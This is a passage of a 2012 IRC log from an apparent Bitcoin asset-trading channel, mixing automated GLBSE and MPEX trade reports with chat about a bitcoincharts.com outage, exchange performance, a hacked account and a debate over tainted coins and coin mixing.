[GLBSE] [GMVT-BOT] 5 @ 0.1 = 0.5 BTC [+] Aug 25 06:41:46 [MPEX] [F.GIGA.ETF] 3481 @ 0.00099858 = 3.4761 BTC [+] Aug 25 06:41:53 [GLBSE] [GSDPT] 300 @ 0.00350001 = 1.05 BTC [+] Aug 25 06:42:43 [MPEX] [S.MPOE] 30779 @ 0.00038114 = 11.7311 BTC [+] Aug 25 06:42:45 [MPEX] [S.MPOE] 14821 @ 0.00038496 = 5.7055 BTC [+] Aug 25 06:45:08 [GLBSE] [ASICMINER] 8 @ 0.0899 = 0.7192 BTC [-] Aug 25 06:50:01 [GLBSE] [GSDPT] 66 @ 0.0035 = 0.231 BTC [-] Aug 25 06:50:17 [GLBSE] [GMVT-BOT] 1 @ 0.1 BTC [+] Aug 25 06:50:58 !ticker nyan.a Aug 25 06:51:00 [GLBSE:NYAN.A] [Bid: ] [Ask: 1] [Spread: 1] [Last: 1] [24hVol: ] [7dAvg: 1.00285714] Aug 25 06:52:27 usagi : did nyan.a miss dividend ? Aug 25 06:52:56 o nm, due 26 not 24. my bad. **** BEGIN LOGGING AT Sat Aug 25 13:13:42 2012 Aug 25 13:13:44 http://www.bitcoincharts.com/markets/mtgoxUSD.html Aug 25 13:13:52 I'm going to write a new backend for GLBSE Aug 25 13:13:53 ;;ticker Aug 25 13:13:53 Best bid: 10.37232, Best ask: 10.44804, Bid-ask spread: 0.07572, Last trade: 10.37215, 24 hour volume: 98875, 24 hour low: 9.86123, 24 hour high: 10.62611 Aug 25 13:13:55 FUUUUU, I need the data... Aug 25 13:14:00 And it will be SO fast Aug 25 13:14:07 that it will be like users get punched in the face. Aug 25 13:14:24 usagi didn't know you worked with glbse Aug 25 13:14:28 I don't Aug 25 13:14:31 It will be a gift. Aug 25 13:14:32 ... Aug 25 13:14:33 lol Aug 25 13:14:58 wait, is charts gown for good ? Aug 25 13:14:59 Nefario what do you think, if I write a smoking hot backend would you use it? Aug 25 13:15:07 fuck. Aug 25 13:15:11 how do i price options nao. Aug 25 13:15:24 Indeed... Aug 25 13:15:30 Use GLBSE api? Aug 25 13:15:33 When I say smoking hot, I mean 1,000 concurrent users all doing heavy trading being handled within seconds Aug 25 13:15:39 arf, I meant mtgox Aug 25 13:15:48 im not using mtgox api. Aug 25 13:15:50 No it would be server side, i'd give him the source code Aug 25 13:16:09 what does ;;ticker use ? Aug 25 13:16:13 [GLBSE] [GMVT-BOT] 47 @ 0.1 = 4.7 BTC [+] Aug 25 13:16:13 When I say smoking hot I am talking enterprise class Aug 25 13:16:29 usagi, I'd be reluctant to move to any new code base Aug 25 13:16:35 current one is reliable and secure Aug 25 13:16:40 albeit a little slow Aug 25 13:16:55 but that can and is being fixed Aug 25 13:17:02 deadterra! hello ? Aug 25 13:17:15 I don't think he's here Aug 25 13:17:40 this boggles. dood wants to do a pt, dissapears. Aug 25 13:17:42 deadt said he would be back in 7 hours Aug 25 13:17:52 7 hours from when ? Aug 25 13:17:59 about 20 mins ago Aug 25 13:18:25 He was just there, trying to figure out how to transact... Aug 25 13:18:32 Wouldn't work apparently Aug 25 13:18:42 [GLBSE] [ASICMINER] 37 @ 0.08989999 = 3.3263 BTC [-] Aug 25 13:18:47 yeah. yesterday, about this time, i'm hey, lets go over this make sure it works for you Aug 25 13:18:49 he has to go. Aug 25 13:19:03 stays gone all through. Aug 25 13:19:15 Not sure at which step it got stuck, I think putting in the buy order Aug 25 13:19:43 !ticker GSDPT Aug 25 13:19:45 [GLBSE:GSDPT] [Bid: 0.0035] [Ask: 0.0065] [Spread: 0.003] [Last: 0.007] [24hVol: 245.987603] [7dAvg: 0.004098] Aug 25 13:19:54 last 0.007 that's nice. Aug 25 13:19:59 All sold Aug 25 13:20:08 so basically a bunch of people are getting defrauded on glbse cause of all this. Aug 25 13:20:44 He said he'd pay the 0.0002 extra for round two out of his pocket Aug 25 13:20:59 If he couldn't figure it in time Aug 25 13:21:10 14 BTC on 70000 shares Aug 25 13:21:18 eh Aug 25 13:21:20 sucks tho Aug 25 13:21:45 Well your interface is not easy to use, it's closer to an API Aug 25 13:21:51 it's an API actually Aug 25 13:22:02 you just install python, sign the exchange key and trade Aug 25 13:22:04 the kind which would need brokers built around it Aug 25 13:22:07 it seriously isn't that big a deal. Aug 25 13:22:16 mircea_popescu: you know we used to have that Aug 25 13:22:17 but yes, it is. Aug 25 13:22:30 then we actually made something people used Aug 25 13:22:32 nefario shouldn't ever have moved from it. Aug 25 13:22:35 [MPEX] [F.GIGA.ETF] 3821 @ 0.00101627 = 3.8832 BTC [+] Aug 25 13:22:42 For you maybe, for the average Joe, not easy to use Aug 25 13:22:46 nefario finance is not about people. finance is about money. Aug 25 13:22:57 this isn't just finance Aug 25 13:23:02 what people use is a discussion about facebook. Aug 25 13:23:11 yes, yes it is. it's entirely about finance and nothing else but finance. Aug 25 13:23:37 no reason to exclude people Aug 25 13:23:55 plenty of reason to expect people to adapt to the needs of money, rather than to expect money to adapt. Aug 25 13:23:56 just cause your incapable or putting lipstick on a pig Aug 25 13:24:01 doesn't mean you shouldn't try Aug 25 13:24:03 money is dumb. or too clever. in any case disinterested in people. Aug 25 13:24:09 it's people that are interested in money. Aug 25 13:24:24 [GLBSE] [HYDRO.BONDS] 6 @ 1.635 = 9.81 BTC [-] Aug 25 13:24:26 [GLBSE] [HYDRO.BONDS] 14 @ 1.64 = 22.96 BTC [+] Aug 25 13:24:41 Mircea, you know how most bank service for brokerage and holding your portfolio, making transactions and all, all use a very nice interface so the trader can easily do his transactions? Your backend is an API, the kind you'd run the central exchange with. But regular traders won't use that. Aug 25 13:24:57 BTC-Mining it's deliberately made like that man. Aug 25 13:25:07 specifically to encouage and foster growth in the community. Aug 25 13:25:12 That's what I heard. Aug 25 13:25:16 i am not interested in dominating the entire chain. all i want is to do one thing well Aug 25 13:25:29 and allow other people to start doing things well, and make sense, and understand wtf is going on and participate. Aug 25 13:25:38 So get a broker with a website and the whole nice user interface service going. Aug 25 13:25:48 there's plenty of people working. Aug 25 13:25:48 Well actually, someone might do that eventually Aug 25 13:25:55 apparently it's not such a high priority or something. Aug 25 13:25:56 im going to get so trashed tonight :) Aug 25 13:26:08 and some some of these fine cubans from coldhardmetal :) Aug 25 13:26:19 nice... Aug 25 13:28:07 just thought id share:) Aug 25 13:28:11 nice to be back home! Aug 25 13:28:39 hi goat Aug 25 13:28:45 so what the heck got into the bitcoincahrts guy ? did he get his money frozen ? Aug 25 13:28:57 ;;ticker Aug 25 13:28:57 Best bid: 10.384, Best ask: 10.4698, Bid-ask spread: 0.08580, Last trade: 10.37232, 24 hour volume: 98658, 24 hour low: 9.88789, 24 hour high: 10.62611 Aug 25 13:29:03 Something like that maybe Aug 25 13:29:32 ;;bc,24h Aug 25 13:29:33 Error: "bc,24h" is not a valid command. Aug 25 13:29:42 mmm how do you say that ? day's avg price ? Aug 25 13:29:54 hmmm Aug 25 13:30:06 someone else is going to have to step in Aug 25 13:30:15 hi usagi Aug 25 13:30:36 He could give the source to someone if he's so pissed... Aug 25 13:31:30 myea. Aug 25 13:31:34 [MPEX] [S.MPOE] 25997 @ 0.00038655 = 10.0491 BTC [-] Aug 25 13:31:35 [MPEX] [S.MPOE] 21503 @ 0.00038595 = 8.2991 BTC [-] Aug 25 13:32:05 what source Aug 25 13:32:17 so what other feed providers are there ? Aug 25 13:32:26 http://www.bitcoincharts.com/ Aug 25 13:32:29 THAT Aug 25 13:32:40 All charts gone :'( Aug 25 13:32:54 oh we might do this Aug 25 13:33:00 we've got a GLBSE charts backend Aug 25 13:33:08 coming up Aug 25 13:33:18 which could easily be moved to this Aug 25 13:33:31 Yeah you should do data and charts in-house Aug 25 13:33:33 ah yea, you were using their charts huh ? Aug 25 13:33:45 getting off seems a good move in retrospect. Aug 25 13:33:59 I was Aug 25 13:34:04 they were not cheap Aug 25 13:34:14 he's a weird character Aug 25 13:34:26 Who's that he? Aug 25 13:34:31 Okay, so what are we using instead of bitcoincharts? Aug 25 13:34:33 the btcharts guy Aug 25 13:34:36 bitcoincharts guy Aug 25 13:34:43 threatened to take intersango off the site Aug 25 13:34:56 if they did anything about tainted coins Aug 25 13:35:03 or did anything about stolen BTC Aug 25 13:35:13 [GLBSE] [COGNITIVE] 5 @ 0.6004 = 3.002 BTC [+] Aug 25 13:35:14 i would too. Aug 25 13:35:23 bs "stolen coins". Aug 25 13:36:04 aint BS if the address they're sent to is on your exchange Aug 25 13:36:13 since it can be tracked Aug 25 13:36:15 puts exchanges at risk Aug 25 13:36:18 the notion of "stolen" is problematic. Aug 25 13:36:26 do explain Aug 25 13:36:44 with the ammount of bs, drama and stupidity going on on the forum Aug 25 13:36:50 and with the qty of plain out lieing ppl do Aug 25 13:37:00 any claim of coins being stolen is less than certain. Aug 25 13:37:03 that for one. Aug 25 13:37:10 for the other, tainting coins will ruin the protocol. Aug 25 13:37:25 doesn't mean it's not a thread to exchange operators Aug 25 13:37:37 who have to operate in the current banking and legal system Aug 25 13:38:11 a threat it may be, yes. Aug 25 13:38:13 which is app to shut down and arrest those who allow the proceeds of crime to go through their system Aug 25 13:38:24 or even percieved crime Aug 25 13:38:30 but i don't think btc cares one way or the other. Aug 25 13:38:33 and Im not even talking about tained coins Aug 25 13:38:44 BTC doesn't Aug 25 13:38:51 NYPD etc. might Aug 25 13:39:00 that's the thing with btc, it opened up avenues of inconceivable competition Aug 25 13:39:07 now we have legal jurisdiction competition going on. Aug 25 13:39:24 possibly Aug 25 13:39:32 but at any rate : his reaction if a pure btc play. Aug 25 13:39:38 so in this context it makes perfect sense. Aug 25 13:39:40 I think so too Aug 25 13:39:49 I think it's become too expensive for him Aug 25 13:39:51 [GLBSE] [YARR] 7 @ 0.9999999 = 7 BTC [+] Aug 25 13:39:51 course, it's a cost the fiat-exposed people can't jedge against Aug 25 13:39:53 [GLBSE] [HYDRO.BONDS] 1 @ 1.64 BTC [+] Aug 25 13:40:01 so it will be one of the great btc-political debates of our time. Aug 25 13:40:02 [GLBSE] [OBSI.1MHS] 6 @ 0.098 = 0.588 BTC [-] Aug 25 13:40:09 but i for one am soundly on the liberty or death camp. Aug 25 13:40:29 [GLBSE] [GIGAMINING] 1 @ 0.9819 BTC [-] Aug 25 13:40:31 [GLBSE] [OBSI.HRPT] 1 @ 0.108 BTC [-] Aug 25 13:40:32 [GLBSE] [OBSI.HRPT] 2 @ 0.105 = 0.21 BTC [-] Aug 25 13:40:34 [GLBSE] [OBSI.HRPT] 6 @ 0.1025 = 0.615 BTC [-] Aug 25 13:40:53 [GLBSE] [PUREASIC] 1 @ 0.8 BTC [+] Aug 25 13:41:07 a well, meanwhile people whining at me they can't price options Aug 25 13:41:34 people complain GLBSE is slow Aug 25 13:41:45 good problems to have Aug 25 13:42:02 [GLBSE] [BTC-MINING] 1 @ 0.99 BTC [-] Aug 25 13:42:05 well actually glbse was pretty fast most of yest Aug 25 13:42:30 it's good enough for me, now, anyway Aug 25 13:42:58 It's not possible to track stolen coins Aug 25 13:43:02 Just use hotwallet Aug 25 13:43:11 Coins go in dirty, come out clean Aug 25 13:43:13 http://www.livebitcointicker.com/ how about this. Aug 25 13:43:20 tradehill still there. Aug 25 13:43:24 No I mean it's not possible to track who owns coins anymore. Aug 25 13:43:28 [MPEX] [S.MPOE] 4433 @ 0.00038595 = 1.7109 BTC [-] Aug 25 13:43:28 [MPEX] [S.MPOE] 27500 @ 0.00038589 = 10.612 BTC [-] Aug 25 13:43:30 [MPEX] [S.MPOE] 10245 @ 0.00038532 = 3.9476 BTC [-] Aug 25 13:43:31 [MPEX] [S.MPOE] 522 @ 0.00038504 = 0.201 BTC [-] Aug 25 13:43:50 It probably never was since satoshidice can pay out to another address Aug 25 13:43:56 Which is 99% of the reason people use it Aug 25 13:44:09 usagi you think ? Aug 25 13:44:20 Once the bitcoinina hack money gets cleaned up thru satoshidice it will tank. Aug 25 13:44:20 there's wallet mixers that don't charge 2% Aug 25 13:44:26 33,000 btc a year profit.. lol Aug 25 13:44:46 Yeah hotwallet is an automixing wallet and we don't charge any fees at all. Aug 25 13:44:59 so then why would people go to sdice. Aug 25 13:45:06 Something to invest in Aug 25 13:45:32 When I make the transition over to bootstrap completely, introduce litecoins and an exchane for them Aug 25 13:45:37 I'll ipo hotwallet Aug 25 13:45:39 no, if you automix coins for free why would they mix through sdice at 2% fee Aug 25 13:45:48 Well that too Aug 25 13:45:56 I'll shoot for a valuation about half of satoshidice's. Aug 25 13:45:59 well that too what lol Aug 25 13:46:26 A number of people have told me that there needs to be a competitor to satoshidice Aug 25 13:46:37 I've already done that. Aug 25 13:46:39 a few said that on the forum. Aug 25 13:46:53 I have an anonymous automixing wallet with a gambling game on it with 100% odds. Aug 25 13:47:11 Once I clean it up a bit and think of a business model... it's game over for satoshidice Aug 25 13:47:14 http://www.bitcoinbullbear.com/ i like people into tech analysis. Aug 25 13:47:25 :) more power to ya. Aug 25 13:47:28 I will call it usagidice Aug 25 13:47:50 Mircea have you played devil coins yet? Aug 25 13:48:02 It has completely fair odds. Aug 25 13:48:19 In fact if it makes too much money, it jinxes it's own roll and loses automatically Aug 25 13:48:27 http://blockchain.info/charts/n-transactions-per-block this looks real good doesn't it. Aug 25 13:48:31 [GLBSE] [BMF] 2 @ 0.58 = 1.16 BTC [-] Aug 25 13:48:32 [GLBSE] [BMF] 18 @ 0.59 = 10.62 BTC [+] Aug 25 13:48:32 The constraints on the pot are 0.0003 and 0.0005 now Aug 25 13:48:41 usagi never even heard of it. Aug 25 13:48:58 [GLBSE] [GIGAMINING] 9 @ 0.982 = 8.838 BTC [+] Aug 25 13:49:02 https://199.48.69.241/hotwallet/devicoin.php Aug 25 13:49:35 oh its broken :< Aug 25 13:49:38 brb lol Aug 25 13:49:49 The Bitcoin Economy Is Collapsing With No Sign of Recovery ... Aug 25 13:49:56 8 Aug 2011 – BitcoinCharts-Post.jpg When Newsweek/The Daily Beast's Dan Lyons wrote about Bitcoins back in mid-June, that was a sure sign the digital ... Aug 25 13:49:57 lulz. Aug 25 13:50:15 [MPEX] [F.GIGA.ETF] 2185 @ 0.00101619 = 2.2204 BTC [-] Aug 25 13:50:16 [MPEX] [F.GIGA.ETF] 3853 @ 0.00101475 = 3.9098 BTC [-] Aug 25 13:50:17 [MPEX] [F.GIGA.ETF] 8331 @ 0.00100438 = 8.3675 BTC [-] Aug 25 13:50:35 mircea_popescu: the reason SD is being used to "launder" coins is that it was already fairly popular by BTC standards Aug 25 13:50:47 no point in using a mixing service wth little turnover Aug 25 13:50:56 SD had decent turnover Aug 25 13:51:05 that may be a point yea. but it would also mean that the usage for laundering has to be a fraction of total usage. Aug 25 13:51:10 they could use exchanges Aug 25 13:51:13 but Aug 25 13:51:14 which was what i was trying to delicately point out to the guy Aug 25 13:51:18 they're in danger of getting caught Aug 25 13:51:38 mircea_popescu: possibly at the outset Aug 25 13:51:43 but you know Aug 25 13:51:48 moss grows fat on a rolling stone Aug 25 13:51:50 well if you mix dirty wiht dirty you don't get clean. Aug 25 13:52:03 but you do make it really hard to trace Aug 25 13:52:09 and mixed with clean Aug 25 13:52:11 [GLBSE] [DMC] 61 @ 0.05199999 = 3.172 BTC [+] Aug 25 13:52:13 [GLBSE] [DMC] 845 @ 0.052 = 43.94 BTC [+] Aug 25 13:52:13 [GLBSE] [DMC] 94 @ 0.054 = 5.076 BTC [+] Aug 25 13:52:19 and then everyone has coffee coloured coins Aug 25 13:52:24 There's no such thing as dirty bitcoins! Aug 25 13:52:35 depends where you keep yours Aug 25 13:52:54 http://bitcoincharts.com/ Aug 25 13:52:57 he changed the text. Aug 25 13:53:04 BTC-Mining i agree. pecunia non olet. Aug 25 13:53:14 Just dip in them in some in some interweb virtual cola flavored soda and they'll stay clean! Aug 25 13:53:14 let people mind their own fucking property not farm out their costs on me. Aug 25 13:53:31 [GLBSE] [GSDPT] 1 @ 0.0065 BTC [-] Aug 25 13:53:33 [GLBSE] [GSDPT] 99 @ 0.0066 = 0.6534 BTC [+] Aug 25 13:54:27 [GLBSE] [GSDPT] 500 @ 0.0066 = 3.3 BTC [+] Aug 25 13:55:45 [GLBSE] [GSDPT] 100 @ 0.0066 = 0.66 BTC [+] Aug 25 13:55:50 [GLBSE] [PAJKA.BOND] 1 @ 0.089 BTC [-] Aug 25 13:56:08 Ahh there we go Aug 25 13:56:17 I was working on something late last night and forgot about it when I crashed Aug 25 13:56:19 https://199.48.69.241/hotwallet/devicoin.php Aug 25 13:56:36 [GLBSE] [ARS] 47 @ 0.015 = 0.705 BTC [+] Aug 25 13:56:56 Check it out mircea. I would sincerely value your opinion Aug 25 13:57:03 [GLBSE] [TYGRR.BOND-A] 37 @ 0.1 = 3.7 BTC [+] Aug 25 13:57:16 About GSDPT Aug 25 13:57:16 http://29.media.tumblr.com/tumblr_lltzgnHi5F1qzib3wo1_400.jpg Aug 25 13:57:27 lol Aug 25 13:57:42 That's some nice pricing Aug 25 13:58:04 .1 hmmm Aug 25 13:58:11 for bond-A Aug 25 13:58:23 well i don't like it usagi cause it requires me to make an acct. i hate making accts. Aug 25 13:58:32 is -a insured ? Aug 25 13:58:33 Accounts are free Aug 25 13:58:37 !ticker TYGRR.BOND-A Aug 25 13:58:39 [GLBSE:TYGRR.BOND-A] [Bid: 0.02] [Ask: 0.1] [Spread: 0.08] [Last: 0.1] [24hVol: 3.7] [7dAvg: 0.1038] Aug 25 13:58:40 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6002337 = 1.2005 BTC [-] Aug 25 13:58:41 [GLBSE] [TYGRR.BOND-P] 18 @ 0.6001337 = 10.8024 BTC [-] Aug 25 13:58:51 usagi it's not a matter of cost, i have money. Aug 25 13:58:52 [GLBSE] [MMM] 3 @ 0.8 = 2.4 BTC [+] Aug 25 13:58:57 A is a mining bond Aug 25 13:59:04 [GLBSE] [TYGRR.BOND-A] 120 @ 0.1 = 12 BTC [+] Aug 25 13:59:21 Chaang-Noi on 4 btc volume, doesn't matter anyway. Aug 25 13:59:27 paladon what's this fund thing i hear about ? Aug 25 14:00:49 who sold that mining bond to almost nothing Aug 25 14:00:52 !ticker rareearth Aug 25 14:00:57 its at 0 thats crazy Aug 25 14:00:57 [GLBSE:RAREEARTH] [Bid: 0.009] [Ask: 0.01] [Spread: 0.001] [Last: 0.01] [24hVol: ] [7dAvg: 0.00968764] Aug 25 14:01:22 usually the "0" on the chart is more like 0.001 and less Aug 25 14:01:30 yeah who sold at that? Aug 25 14:01:34 and that's usually a hacked account Aug 25 14:01:39 tuesdays dividend will be more than that Aug 25 14:01:42 oh hmmm Aug 25 14:01:44 and Nefario reverse those transactions Aug 25 14:01:46 nefario knows of this? Aug 25 14:02:15 If the account is claimed hacked and the shares haven't already transacted a few times, I guess Aug 25 14:02:37 Not exactly Aug 25 14:02:55 How goes the process? Aug 25 14:02:59 BTC-Mining: that particular instance was exceptional Aug 25 14:03:25 unrolling trades is a nightmare. Aug 25 14:03:27 as was the time kluge got his account hack Aug 25 14:03:31 ja Aug 25 14:03:36 oh Aug 25 14:03:41 how did that happen nefario ? was it actyally session stiolen ? Aug 25 14:03:55 No, I think simply not using 2 step auth... Aug 25 14:04:00 no 2fa. Aug 25 14:04:07 well yea, no 2fa. but session stolen ? Aug 25 14:04:14 and he used the same password on gpumax. Aug 25 14:04:16 (you can't really steal 2fa sessions i don't imagine) Aug 25 14:04:19 and a few other places. Aug 25 14:04:22 no his password was re-used and compromised Aug 25 14:04:26 so was it pw compromise ? aha Aug 25 14:04:37 i heard both variants so i didn't know what to make of it. Aug 25 14:04:39 mornin Aug 25 14:04:43 Because users are careless Aug 25 14:04:48 heya kakobrekla Aug 25 14:04:53 good day kako Aug 25 14:04:57 I'm off here Aug 25 14:05:00 darling do something about this : http://bitcoincharts.com/ Aug 25 14:05:01 what did i miss Aug 25 14:05:02 Goodbye Aug 25 14:05:02 As soon as GLBSE replaces the submit acttion button with a yubikey textarea I will be able to sleep at night Aug 25 14:05:05 mircea_popescu: his email wsa also compromised AFAIK Aug 25 14:05:13 hi kakobrekla Aug 25 14:05:24 usagi you want it to be moar like mpex ? Aug 25 14:05:26 bye btc-mining Aug 25 14:05:28 ill add yubikey next month Aug 25 14:05:34 hi goat :) Aug 25 14:05:41 MPEX doesn't use yubikeys Aug 25 14:05:50 but it has textarea! 1 out of 2!!! Aug 25 14:05:54 It uses GPG, which is secure in different ways, but also a lot harder to use. Aug 25 14:05:58 whats with bitcoincharts.com Aug 25 14:06:03 he quit Aug 25 14:06:06 fix it omg! Aug 25 14:06:11 r u srs? Aug 25 14:06:15 YES Aug 25 14:06:15 i have 48 emails in like pasy half hour Aug 25 14:06:18 he just went down. Aug 25 14:06:22 woah. Aug 25 14:06:23 My exchange system will be more secure than MPEX. Aug 25 14:06:35 usagi i recall kronos saying that. Aug 25 14:06:48 Yeah but lets be honest, that team had shitty coders on it. Aug 25 14:06:48 well this is bad (bitcoincharts.com thingy) Aug 25 14:06:57 i know! it's horrid. Aug 25 14:07:06 they needed competition anyway. get codin' Aug 25 14:07:22 [GLBSE] [PUREMINING] 3 @ 0.0999 = 0.2997 BTC [-] Aug 25 14:07:35 hmm Aug 25 14:07:41 i am not even kidding kakobrekla, you're the person for the job. already run some information services here, are trustworthuy Aug 25 14:07:45 and apparently you can code. Aug 25 14:08:15 his ideea is sound, have charts, adata feed, some advertising etc. makes a dime. Aug 25 14:08:48 i will think about it, first i need to get some coffee. Aug 25 14:10:44 [MPEX] [S.MPOE] 200 @ 0.00038528 = 0.0771 BTC [+] Aug 25 14:10:46 [MPEX] [S.MPOE] 9978 @ 0.00038504 = 3.8419 BTC [-] Aug 25 14:10:46 [MPEX] [S.MPOE] 12222 @ 0.00038445 = 4.6987 BTC [-] Aug 25 14:11:13 [GLBSE] [DMC] 135 @ 0.054 = 7.29 BTC [+] Aug 25 14:11:41 [MPEX] [S.MPOE] 35378 @ 0.00038445 = 13.6011 BTC [-] Aug 25 14:11:43 [MPEX] [S.MPOE] 41300 @ 0.00038438 = 15.8749 BTC [-] Aug 25 14:11:44 [MPEX] [S.MPOE] 28700 @ 0.00038422 = 11.0271 BTC [-] Aug 25 14:11:45 [MPEX] [S.MPOE] 1900 @ 0.00038382 = 0.7293 BTC [-] Aug 25 14:11:46 [MPEX] [S.MPOE] 43300 @ 0.00038379 = 16.6181 BTC [-] Aug 25 14:11:48 [MPEX] [S.MPOE] 58000 @ 0.00038373 = 22.2563 BTC [-] Aug 25 14:11:49 [MPEX] [S.MPOE] 4300 @ 0.00038321 = 1.6478 BTC [-] Aug 25 14:11:49 [MPEX] [S.MPOE] 37122 @ 0.00038265 = 14.2047 BTC [-] Aug 25 14:11:52 gah, already being sold off. teh horror! Aug 25 14:12:10 fucking hell i wake up X thing exploded. what is this, quicksand ?! Aug 25 14:13:51 [GLBSE] [DMC] 100 @ 0.065 = 6.5 BTC [+] Aug 25 14:13:52 [GLBSE] [DMC] 1 @ 0.0749999 BTC [+] Aug 25 14:13:54 [GLBSE] [DMC] 30 @ 0.075 = 2.25 BTC [+] Aug 25 14:16:40 [GLBSE] [DMC] 70 @ 0.075 = 5.25 BTC [+] Aug 25 14:16:41 [GLBSE] [DMC] 80 @ 0.07899999 = 6.32 BTC [+] Aug 25 14:18:03 [MPEX] [S.MPOE] 21778 @ 0.00038265 = 8.3334 BTC [-] Aug 25 14:18:04 [MPEX] [S.MPOE] 45556 @ 0.00038066 = 17.3413 BTC [-] Aug 25 14:18:06 [MPEX] [S.MPOE] 1234 @ 0.00038047 = 0.4695 BTC [-] Aug 25 14:18:07 [MPEX] [S.MPOE] 41432 @ 0.00038024 = 15.7541 BTC [-] Aug 25 14:20:26 13:12.08 ( mircea_popescu ) fucking hell i wake up X thing exploded. what is this, quicksand ?! Aug 25 14:20:28 o? Aug 25 14:20:39 [MPEX] [F.GIGA.ETF] 1400 @ 0.00101045 = 1.4146 BTC [+] Aug 25 14:20:41 [MPEX] [F.GIGA.ETF] 5329 @ 0.00101627 = 5.4157 BTC [+] Aug 25 14:20:42 [MPEX] [F.GIGA.ETF] 2683 @ 0.00101868 = 2.7331 BTC [+] Aug 25 14:20:43 well btccharts. Aug 25 14:21:01 [MPEX] [S.MPOE] 3607 @ 0.00038024 = 1.3715 BTC [-] Aug 25 14:21:01 [MPEX] [S.MPOE] 16200 @ 0.0003793 = 6.1447 BTC [-] Aug 25 14:21:03 [MPEX] [S.MPOE] 10000 @ 0.00037896 = 3.7896 BTC [-] Aug 25 14:21:04 [MPEX] [S.MPOE] 61800 @ 0.00037659 = 23.2733 BTC [-] Aug 25 14:21:05 [MPEX] [S.MPOE] 24400 @ 0.00037648 = 9.1861 BTC [-] Aug 25 14:21:06 [MPEX] [S.MPOE] 23993 @ 0.00037645 = 9.0322 BTC [-] Aug 25 14:21:16 !ticker s.mpoe Aug 25 14:21:17 [MPEX:S.MPOE] 1day: 0.000035 / 0.00030099 / 0.0004 (6071383 shares, 1,827.43 BTC), 30day: 0.000035 / 0.00036137 / 0.00041457 (67994575 shares, 24,571.65 BTC) Aug 25 14:22:29 [GLBSE] [PUREMINING] 2 @ 0.0999 = 0.1998 BTC [-] Aug 25 14:26:28 [GLBSE] [DMC] 118 @ 0.07899999 = 9.322 BTC [+] Aug 25 14:35:34 [MPEX] [S.MPOE] 551 @ 0.00038118 = 0.21 BTC [+] Aug 25 14:38:24 [GLBSE] [FOO.PPPPT] 6 @ 0.6 = 3.6 BTC [+] Aug 25 14:38:34 http://www.worldzeitgeist.org:443/images/socnet/bitcoin-assets/bitcoin-assets-current.png Aug 25 14:38:58 usagi whenwil lthe 1 btc for yarr be paid out Aug 25 14:39:06 the dividend? Aug 25 14:39:16 We've already bought back almost 1000 shares Aug 25 14:39:33 haha cool kakobrekla where from ? Aug 25 14:40:05 Put up your shares at 1, that's what the contract says we will do Aug 25 14:40:09 We will buy back not pay out Aug 25 14:40:10 dunno someone pasted it in #btcst Aug 25 14:40:20 I may pay out as a final action if some people are not going to sell their shares Aug 25 14:40:30 [GLBSE] [ASICMINER] 5 @ 0.08989999 = 0.4495 BTC [-] Aug 25 14:40:35 kakobrekla kinda interesting. Aug 25 14:40:47 ahh, i thought you were going to do a dividend Aug 25 14:40:49 but its old data Aug 25 14:40:55 jul 13 Aug 25 14:41:02 no assbot huh Aug 25 14:41:09 so get tjhem to make a new 1 Aug 25 14:41:10 wasnt born then yet Aug 25 14:41:29 [GLBSE] [GIGAMINING] 2 @ 0.9819 = 1.9638 BTC [-] Aug 25 14:41:31 [GLBSE] [GIGAMINING] 3 @ 0.982 = 2.946 BTC [+] Aug 25 14:43:00 [GLBSE] [DMC] 100 @ 0.09999999 = 10 BTC [+] Aug 25 14:45:48 [MPEX] [S.MPOE] 3000 @ 0.00037764 = 1.1329 BTC [-] Aug 25 14:45:49 [MPEX] [S.MPOE] 15207 @ 0.00037645 = 5.7247 BTC [-] Aug 25 14:45:51 [MPEX] [S.MPOE] 5300 @ 0.00037614 = 1.9935 BTC [-] Aug 25 14:45:51 [MPEX] [S.MPOE] 22300 @ 0.00037598 = 8.3844 BTC [-] Aug 25 14:46:14 [GLBSE] [TYGRR.BOND-P] 18 @ 0.6001337 = 10.8024 BTC [-] Aug 25 14:47:10 Nefario: Why doesn't the bid/ask trade window show up 50% of the time when I load a page? Aug 25 14:47:19 I just loaded a page like 7 or 8 times and no trade area Aug 25 14:48:01 [GLBSE] [DMC] 3 @ 0.06 = 0.18 BTC [-] Aug 25 14:48:02 api rate limit Aug 25 14:48:21 [GLBSE] [TYGRR.BOND-A] 30 @ 0.1 = 3 BTC [+] Aug 25 14:48:22 that bothers me too Aug 25 14:48:26 pain in the ass... Aug 25 14:48:33 nef Aug 25 14:48:41 I can seriously write you an enterprise class backend Aug 25 14:49:01 Im talking 1000 concurrent requests in just a couple of seconds, max Aug 25 14:49:31 tests indicate 10,000+ requests per second in an optimal environment Aug 25 14:51:34 Ive got a new API service coming online soon Aug 25 14:51:56 the rate limit will be increased significantly then Aug 25 14:52:08 and GLBSE core will speed up a lot Aug 25 14:52:16 http://www.techdirt.com/articles/20120215/18044017773/us-government-suspends-jotformcom-over-user-generated-forms-censorship-regime-expands.shtml Aug 25 14:52:22 the us govt seriously sucks. period. Aug 25 14:52:24 not having to handle those requests Aug 25 14:52:28 i don't understand why anyone'd still support it. Aug 25 14:52:44 they get paid by it? Aug 25 14:52:57 i.e. vested interests Aug 25 14:53:16 ya but those aren't people. if you work for a government you're, basically, scum. Aug 25 14:55:40 [GLBSE] [GSDPT] 10 @ 0.0066 = 0.066 BTC [+] Aug 25 14:56:08 [GLBSE] [GSDPT] 2 @ 0.0066 = 0.0132 BTC [+] Aug 25 14:58:54 http://bitcoincharts.com/charts/ he's back Aug 25 14:59:12 from what i gather a douchy exchange which we won;t name stepped the fuck back. Aug 25 14:59:34 :) Aug 25 15:01:19 [MPEX] [F.GIGA.ETF] 3917 @ 0.00101868 = 3.9902 BTC [+] Aug 25 15:01:21 [MPEX] [F.GIGA.ETF] 1583 @ 0.00102135 = 1.6168 BTC [+] Aug 25 15:01:58 steped the fuck back from what Aug 25 15:02:11 im not following this completley Aug 25 15:02:12 well seems the guy's acct got frozen Aug 25 15:02:19 so he blew his top Aug 25 15:02:43 oh wow Aug 25 15:02:49 [GLBSE] [GMVT-BOT] 10 @ 0.106 = 1.06 BTC [+] Aug 25 15:03:09 well good Aug 25 15:03:18 happy i dont have to take up the work Aug 25 15:04:09 :) Aug 25 15:04:17 fast paced environment, btc Aug 25 15:05:06 about 10x faster than internet and 100x than real world Aug 25 15:05:31 ^^ kakobrekla Aug 25 15:05:37 thanks :) Aug 25 15:05:41 " I'm beginning to understand that this whole operation and stock sale are not intended to take in to consideration any body of law, and you all are comfortable with the risks involved with that. It's basically a gentleman's agreement 